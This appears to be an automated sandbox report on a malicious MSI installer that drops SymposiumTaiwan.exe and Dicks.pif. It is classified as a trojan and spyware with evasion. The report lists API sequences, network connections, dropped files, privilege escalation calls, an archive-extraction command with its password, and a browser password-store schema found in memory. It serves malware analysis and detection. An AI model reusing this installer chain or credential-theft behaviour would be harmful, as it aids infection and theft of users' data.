Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe

Code function: 8_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

8_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	19_2_000A4830
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	23_2_000A4830
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000BEF91 CountClipboardFormats,SetClipboardData,SetRect,CopyImage,SetWindowPos,GetCursorInfo,IsCharAlphaW,IsCharLowerW,IsCharUpperW,GetCaretPos,SetWindowLongW,	23_2_000BEF91

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_000A4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

19_2_000A4632

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe

Code function: 8_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

8_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		19_2_000BD164
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		23_2_000BD164

System Summary

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

File dump: SymposiumTaiwan.exe.4.dr 895074384

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_00877070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

4_2_00877070

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_00088F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

19_2_00088F2E

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,	8_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00095778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	19_2_00095778
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00095778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	23_2_00095778

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\68e8ef.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEA27.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEA95.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEAB6.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{F7154933-FAB7-4F13-A08C-0291DB5E5D05}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEB24.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\68e8f1.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\68e8f1.msi	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIEA27.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00885984	4_2_00885984
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00878409	4_2_00878409
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0089E8D4	4_2_0089E8D4
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_008830E6	4_2_008830E6
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087E045	4_2_0087E045
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087D1D2	4_2_0087D1D2
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088E94A	4_2_0088E94A
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088FAC8	4_2_0088FAC8
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00873203	4_2_00873203
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087BA1A	4_2_0087BA1A
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088F25E	4_2_0088F25E
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087DBE2	4_2_0087DBE2
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_008863F2	4_2_008863F2
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00882B3A	4_2_00882B3A
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0089A35E	4_2_0089A35E
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00892B78	4_2_00892B78
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087EC97	4_2_0087EC97
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00885DB9	4_2_00885DB9
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00882DB5	4_2_00882DB5
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087D5E4	4_2_0087D5E4
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00875E96	4_2_00875E96
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088F693	4_2_0088F693
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00899EB0	4_2_00899EB0
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088EE46	4_2_0088EE46
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00884FB5	4_2_00884FB5
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00873FC5	4_2_00873FC5
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0087276C	4_2_0087276C
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_0040737E	8_2_0040737E
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_00406EFE	8_2_00406EFE
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_004079A2	8_2_004079A2
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: 8_2_004049A8	8_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0003B020	19_2_0003B020
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000394E0	19_2_000394E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00039C80	19_2_00039C80
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000523F5	19_2_000523F5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000B8400	19_2_000B8400
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00066502	19_2_00066502
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0006265E	19_2_0006265E
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0003E6F0	19_2_0003E6F0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0005282A	19_2_0005282A
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000689BF	19_2_000689BF
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000B0A3A	19_2_000B0A3A
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00066A74	19_2_00066A74
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00040BE0	19_2_00040BE0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0005CD51	19_2_0005CD51
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0008EDB2	19_2_0008EDB2
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00098E44	19_2_00098E44
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000B0EB7	19_2_000B0EB7
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00066FE6	19_2_00066FE6
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000533B7	19_2_000533B7
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0005F409	19_2_0005F409
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0004D45D	19_2_0004D45D
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0004F628	19_2_0004F628
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00031663	19_2_00031663
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0003F6A0	19_2_0003F6A0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000516B4	19_2_000516B4
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000578C3	19_2_000578C3
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0005DBA5	19_2_0005DBA5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00051BA8	19_2_00051BA8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00069CE5	19_2_00069CE5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0004DD28	19_2_0004DD28
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00051FC0	19_2_00051FC0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0005BFD6	19_2_0005BFD6
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000523F5	23_2_000523F5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000B8400	23_2_000B8400
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00066502	23_2_00066502
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0006265E	23_2_0006265E
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0003E6F0	23_2_0003E6F0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0005282A	23_2_0005282A
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000689BF	23_2_000689BF
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000B0A3A	23_2_000B0A3A
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00066A74	23_2_00066A74
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00040BE0	23_2_00040BE0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0005CD51	23_2_0005CD51
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0008EDB2	23_2_0008EDB2
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00098E44	23_2_00098E44
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000B0EB7	23_2_000B0EB7
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00066FE6	23_2_00066FE6
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0003B020	23_2_0003B020
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000533B7	23_2_000533B7
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0005F409	23_2_0005F409
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0004D45D	23_2_0004D45D
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000394E0	23_2_000394E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0004F628	23_2_0004F628
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00031663	23_2_00031663
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0003F6A0	23_2_0003F6A0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000516B4	23_2_000516B4
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_000578C3	23_2_000578C3
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0005DBA5	23_2_0005DBA5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00051BA8	23_2_00051BA8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00039C80	23_2_00039C80
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00069CE5	23_2_00069CE5
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0004DD28	23_2_0004DD28
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00051FC0	23_2_00051FC0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0005BFD6	23_2_0005BFD6
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E62010	23_2_00E62010
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E855E0	23_2_00E855E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E867C8	23_2_00E867C8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E7D720	23_2_00E7D720
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E808D4	23_2_00E808D4
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E76B30	23_2_00E76B30
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E93B13	23_2_00E93B13
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E93D90	23_2_00E93D90
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E6EFD0	23_2_00E6EFD0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E64FA0	23_2_00E64FA0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E662AF	23_2_00E662AF
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E9C260	23_2_00E9C260
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E833B9	23_2_00E833B9
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E68380	23_2_00E68380
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E9A4F0	23_2_00E9A4F0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E824D3	23_2_00E824D3
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E815D0	23_2_00E815D0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E6458F	23_2_00E6458F
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E9A610	23_2_00E9A610
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E667A0	23_2_00E667A0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E87741	23_2_00E87741
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E86894	23_2_00E86894
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E97830	23_2_00E97830
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E9AAF0	23_2_00E9AAF0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E99B0E	23_2_00E99B0E
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E73C88	23_2_00E73C88
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E6EC50	23_2_00E6EC50
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E855E0	23_2_00E855E0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E92C20	23_2_00E92C20
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E6BDF0	23_2_00E6BDF0
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E66D70	23_2_00E66D70
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E65D37	23_2_00E65D37
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E80D10	23_2_00E80D10
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E83ED7	23_2_00E83ED7
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E65FC7	23_2_00E65FC7
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E84F50	23_2_00E84F50
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00E9BF30	23_2_00E9BF30

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: String function: 0088CEC0 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: String function: 0088D870 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: String function: 0088CDF0 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00058B30 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00041A36 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00050D17 appears 140 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00E68DF0 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 0005312D appears 42 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00032111 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00E69570 appears 175 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00034DC0 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 000539FB appears 36 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00061B70 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00041CB6 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: String function: 00059FA5 appears 46 times

Source: NB4EASbynx.msi

Binary or memory string: OriginalFilenameAICustAct.dllF vs NB4EASbynx.msi

Source: classification engine

Classification label: mal100.troj.spyw.evad.winMSI@33/67@2/1

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_0009A6AD GetLastError,FormatMessageW,

19_2_0009A6AD

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00088DE9 AdjustTokenPrivileges,CloseHandle,	19_2_00088DE9
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00089399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	19_2_00089399
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00088DE9 AdjustTokenPrivileges,CloseHandle,	23_2_00088DE9
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00089399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	23_2_00089399

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe

8_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_00094148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

19_2_00094148

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe

Code function: 8_2_004024FB CoCreateInstance,

8_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_00888BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

4_2_00888BD0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\UpdateMSwindows

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6837546

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\MSI4F6E.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Command line argument: sfxname	4_2_0088C131
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Command line argument: sfxstime	4_2_0088C131
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Command line argument: STARTDLG	4_2_0088C131

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\System32\msiexec.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Dicks.pif, 00000017.00000003.3167172073.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3167671554.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156112680.0000000003415000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3155983332.0000000003444000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: NB4EASbynx.msi

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NB4EASbynx.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4C0B4EE6A62E23CFF044B1F01FFADBEC C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp "C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1
